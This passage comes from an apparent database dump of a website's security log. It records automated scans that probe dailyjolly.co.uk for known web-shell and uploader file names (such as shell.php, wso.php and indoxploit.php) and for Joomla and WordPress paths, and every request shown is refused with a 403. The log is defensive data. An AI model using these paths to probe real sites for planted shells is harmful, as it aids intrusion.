97,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','Yb9Aet4RSWasmwpkTFGVKCB0',0,1675088365.5816,227,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','ek0L8fSlsBJ4D6IcWrGQE7RA',0,1675088367.3010,177,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','m4CrO5HhLDquc8jFRaPlB6e2',0,1675088368.6459,167,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/RxR.php','','{\"1\":\"python-requests\\/2.27.1\"}','47QqAy8PJFD5MEocjaI2Gd6v',0,1675088369.3077,217,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"python-requests\\/2.27.1\"}','2cM3NduxKXogVrbj9Qp7a0fz',0,1675088370.5704,159,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/V3.php','','{\"1\":\"python-requests\\/2.27.1\"}','UoHImZJhiqsykwj72rD3XTNu',0,1675088371.3877,190,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','PayOXnc18vsTg6BGDUJIi7AR',0,1675088371.8097,159,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','XDrEKHq1QiZC5dVOzbJNgwmA',0,1675088379.3528,185,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','5oJbsCSDuGVWr8Mwmg7lFpOA',0,1675088380.6168,212,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','Uy76kexvcACWZ9saNMOtKSQh',0,1675088381.7357,190,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/administrator/templates/bluestork/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','dp2VA0WSxYNaT1trIDjeLsGC',0,1675088383.2001,166,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/administrator/templates/bluestork/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','TkhxJPX263nQmF0MRC15ovw7',0,1675088384.4709,181,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/administrator/templates/hathor/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','7YklTMIzRZxfKhW91egpsJ40',0,1675088385.0435,169,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/administrator/templates/hathor/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','aM1p0lWgO38kwmY9PisSCQBv',0,1675088385.6963,164,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/administrator/templates/isis/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','xU6v7caPZOwGsTJjLoNB41qz',0,1675088386.7679,165,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/administrator/templates/isis/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','kCoRryML6lTcIYWjtBuKxbvJ',0,1675088387.3592,186,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/beez/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','g5G6dbvrjxZPSc8KAqonQDue',0,1675088387.9197,217,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/ja_purity/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','xNuTlcz2XgFaLtPROH5f7S1s',0,1675088388.5923,180,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','7ZkNFxpnHMVTtIdvRqW0jGLz',0,1675088389.2492,166,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/system/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','PXv2yMfC4TiKDYHquBSAW3bo',0,1675088389.6576,182,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/system/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','G50XxQzYcpL1lrKPbC83B7kV',0,1675088390.1460,200,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/beez3/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','Xx7afS6F1UgkiNomd4BwhqMn',0,1675088390.7267,203,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/beez3/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','4xYOJhwFACX8IqUf9EQHDWvp',0,1675088391.0950,204,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/beez5/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','Lgr9ZocFfDN5n2W81MRwCTP6',0,1675088391.4883,161,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/beez5/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','ujDHcJVkMX9GQvhnY206Er8z',0,1675088391.9984,165,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/beez_20/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','Alq62jGtZYUPL53zsE7a9Jyh',0,1675088392.3629,158,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/beez_20/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','NUqmaQEFlCYOGu5Xid3PDVkt',0,1675088396.1388,168,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/protostar/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','m8zBPFcn7lkw29YbMKVhDIGp',0,1675088397.9133,164,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/protostar/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','O7ne50DLMIPJuRo1WcyFpbNS',0,1675088399.3134,166,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/atomic/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','a9If0RDbHx4MFGuk8plL6wg2',0,1675088400.7783,224,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/templates/atomic/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','sSqoVIMimDhGa31Bx4NXdHLf',0,1675088402.2079,272,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','sBze7fATECdPUbgq9ZcHXx1l',0,1675088406.2895,175,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','4NHMtBFGcQqpYvzhar0ewkJP',0,1675088407.6636,165,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','Qh2JzUlbM5HCOt9m1a4WcjpK',0,1675088409.3263,165,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','yhMjvIXoWTxz2BfFuLO4ND69',0,1675088409.9799,180,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','XmfQlvN9417MUTwjhLyZCtW8',0,1675088416.1718,165,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','kpTGV8Dg4PHrxR6AB0yJLdcQ',0,1675088416.6015,199,'','GET',403,0,700,0,1,'',0),('51.77.78.41',860704297,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','suAr6QeKdMW9TB5zPi0LYjwG',0,1675088416.9704,174,'','GET',403,0,700,0,1,'',0),('171.217.250.110',2883189358,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/admin.php\"}','n34hyHlqOzjxNvLY2aEBsoQu',0,1675114449.5171,219,'','GET',403,0,700,0,1,'',0),('171.217.250.121',2883189369,'','https://www.dailyjolly.co.uk/wdf.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wdf.php\"}','edunQ52Bi9ElJrHNLUhoK036',0,1675114449.5736,200,'','GET',403,0,700,0,1,'',0),('125.65.229.77',2101470541,'','https://www.dailyjolly.co.uk/newfile.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/newfile.php\"}','uM9yiRzQ4UmVdX7HJrFfxGlk',0,1675114449.6294,196,'','GET',403,0,700,0,1,'',0),('110.190.177.201',1857991113,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/a.php\"}','68uV9S7eb0z2M3xEXcPGJnTK',0,1675114449.8708,213,'','GET',403,0,700,0,1,'',0),('110.190.178.244',1857991412,'','https://www.dailyjolly.co.uk/apache.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/apache.php\"}','h9T0r6CuBkGsgbfpmNlHciVS',0,1675114450.6381,190,'','GET',403,0,700,0,1,'',0),('171.217.250.225',2883189473,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/1.php\"}','UzpNP0O78gJ4KI5RlVoxed6f',0,1675114450.7182,170,'','GET',403,0,700,0,1,'',0),('182.135.116.130',3062330498,'','https://www.dailyjolly.co.uk/wp-content/x.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/x.php\"}','FzoCdeQ8mcNqUksj5vXrI9GA',0,1675114450.7435,177,'','GET',403,0,700,0,1,'',0),('125.65.228.104',2101470312,'','https://www.dailyjolly.co.uk/wp-admin/nginx.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/nginx.php\"}','QCTA75WP3iGxNkLX0qp2mM1b',0,1675114450.8918,170,'','GET',403,0,700,0,1,'',0),('125.65.229.149',2101470613,'','https://www.dailyjolly.co.uk/wp-admin/1.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/1.php\"}','TKD5rL7iAZfqEgFQlH1hM6k4',0,1675114450.8640,209,'','GET',403,0,700,0,1,'',0),('182.145.126.39',3062988327,'','https://www.dailyjolly.co.uk/wp-admin/demodata.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/demodata.php\"}','py3eHZgc60ltwshkBfdbYAFR',0,1675114451.7316,176,'','GET',403,0,700,0,1,'',0),('182.145.92.91',3062979675,'','https://www.dailyjolly.co.uk/wp-admin/admins.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/admins.php\"}','lw9bteZu3V7N64iIKmOWXd0D',0,1675114451.9297,173,'','GET',403,0,700,0,1,'',0),('182.135.116.151',3062330519,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/x.php\"}','swEYxBVaedb6ZF2kzhPmtQMo',0,1675114452.0143,177,'','GET',403,0,700,0,1,'',0),('182.145.126.90',3062988378,'','https://www.dailyjolly.co.uk/admins.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/admins.php\"}','8WpIU7M6jvVLce1uwtxDTor9',0,1675114452.0538,188,'','GET',403,0,700,0,1,'',0),('125.65.229.210',2101470674,'','https://www.dailyjolly.co.uk/wp-admin/newfile.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/newfile.php\"}','2n58ONi6KgtXFVSQhvrZjezy',0,1675114452.0458,263,'','GET',403,0,700,0,1,'',0),('110.190.176.9',1857990665,'','https://www.dailyjolly.co.uk/wp-content/wdf.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/wdf.php\"}','jy90IaArE6UdwqvPHOGeB8Lp',0,1675114452.1012,256,'','GET',403,0,700,0,1,'',0),('171.217.250.234',2883189482,'','https://www.dailyjolly.co.uk/wp-content/admin.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/admin.php\"}','zB0NGFmb61leutIkD9MW4LXs',0,1675114452.1443,236,'','GET',403,0,700,0,1,'',0),('182.135.116.34',3062330402,'','https://www.dailyjolly.co.uk/wp-content/1.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/1.php\"}','4fBSjalGTFYWHZAeso7Oz9gc',0,1675114452.1852,231,'','GET',403,0,700,0,1,'',0),('182.135.116.219',3062330587,'','https://www.dailyjolly.co.uk/wp-admin/apache.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/apache.php\"}','I6xa4hVq1ByLH8v2UFCwMbT3',0,1675114452.2262,227,'','GET',403,0,700,0,1,'',0),('125.65.228.89',2101470297,'','https://www.dailyjolly.co.uk/wp-admin/a.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/a.php\"}','JU6cbHekwmRC07fl4rBQdK1a',0,1675114452.2645,268,'','GET',403,0,700,0,1,'',0),('171.217.250.225',2883189473,'','https://www.dailyjolly.co.uk/wp-content/nginx.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/nginx.php\"}','fq3ubIAHh2G5UEkO9wgKYzZo',0,1675114452.2732,285,'','GET',403,0,700,0,1,'',0),('110.190.176.202',1857990858,'','https://www.dailyjolly.co.uk/wp-content/newfile.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/newfile.php\"}','P6ASWfuZwM2rNEbpvhJiltOC',0,1675114452.3059,285,'','GET',403,0,700,0,1,'',0),('125.65.229.208',2101470672,'','https://www.dailyjolly.co.uk/wp-admin/1234.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/1234.php\"}','zAUyxG37il6XcwKvO21djtag',0,1675114452.2892,301,'','GET',403,0,700,0,1,'',0),('125.65.228.104',2101470312,'','https://www.dailyjolly.co.uk/wp-admin/x.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-admin\\/x.php\"}','dB7lAufTVNMZH8U9YXjeGDqo',0,1675114452.3238,277,'','GET',403,0,700,0,1,'',0),('125.65.229.131',2101470595,'','https://www.dailyjolly.co.uk/wp-includes/wdf.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/wdf.php\"}','NjpWqsRLZ5uYvK1VaUnFDXHt',0,1675114452.3500,309,'','GET',403,0,700,0,1,'',0),('125.65.228.89',2101470297,'','https://www.dailyjolly.co.uk/nginx.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/nginx.php\"}','pPCUaQXWY4VeOcTMZ1m8K6jt',0,1675114452.3682,302,'','GET',403,0,700,0,1,'',0),('125.65.229.208',2101470672,'','https://www.dailyjolly.co.uk/wp-content/admins.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/admins.php\"}','J83yZzSvCo5WHlkUaX6DQun7',0,1675114452.4105,270,'','GET',403,0,700,0,1,'',0),('182.135.116.63',3062330431,'','https://www.dailyjolly.co.uk/wp-includes/admin.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/admin.php\"}','h0vHiy6lFdzV5uAPJ8mqktje',0,1675114452.4515,240,'','GET',403,0,700,0,1,'',0),('125.65.228.104',2101470312,'','https://www.dailyjolly.co.uk/wp-includes/1.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/1.php\"}','b1pCBEJxQrPafUA85GntskeV',0,1675114452.4968,235,'','GET',403,0,700,0,1,'',0),('125.65.229.77',2101470541,'','https://www.dailyjolly.co.uk/wp-content/demodata.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/demodata.php\"}','8DtGYQvkaC0ZyUIc6F1OjzlL',0,1675114452.4946,248,'','GET',403,0,700,0,1,'',0),('171.217.250.121',2883189369,'','https://www.dailyjolly.co.uk/wp-content/a.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/a.php\"}','gcWGdRFlVoCsMqK0ZA1YmLXi',0,1675114452.5326,242,'','GET',403,0,700,0,1,'',0),('125.65.229.181',2101470645,'','https://www.dailyjolly.co.uk/wp-content/apache.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/apache.php\"}','A71DLMmYXx9jTQbzJrGBVhks',0,1675114452.5971,198,'','GET',403,0,700,0,1,'',0),('110.190.177.201',1857991113,'','https://www.dailyjolly.co.uk/wp-content/1234.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/1234.php\"}','cBXZrQHkd9vDLgfYeqzPjoim',0,1675114452.7082,192,'','GET',403,0,700,0,1,'',0),('182.135.116.184',3062330552,'','https://www.dailyjolly.co.uk/wp-includes/nginx.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/nginx.php\"}','0iQwKGnHtPgRavxWEo8IJCUq',0,1675114452.8246,183,'','GET',403,0,700,0,1,'',0),('110.190.178.241',1857991409,'','https://www.dailyjolly.co.uk/wp-includes/admins.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/admins.php\"}','5PQWw4fiAhIpmUt8elGKaOJB',0,1675114452.9309,223,'','GET',403,0,700,0,1,'',0),('182.135.116.219',3062330587,'','https://www.dailyjolly.co.uk/wp-includes/newfile.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/newfile.php\"}','hAHKCWwXIasQxlS2BfMrNFcJ',0,1675114452.9571,207,'','GET',403,0,700,0,1,'',0),('125.65.228.89',2101470297,'','https://www.dailyjolly.co.uk/wp-includes/apache.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/apache.php\"}','LlhFCSAtuK3VZbQxqeHdIv95',0,1675114452.9772,216,'','GET',403,0,700,0,1,'',0),('171.217.250.225',2883189473,'','https://www.dailyjolly.co.uk/wp-includes/a.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-includes\\/a.php\"}','peHGW48wLgXAxZPBMUcd3CDj',0,1675114453.0195,200,'','GET',403,0,700,0,1,'',0),('182.145.126.90',3062988378,'','https://www.dailyjolly.co.uk/wp-includes/1234.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 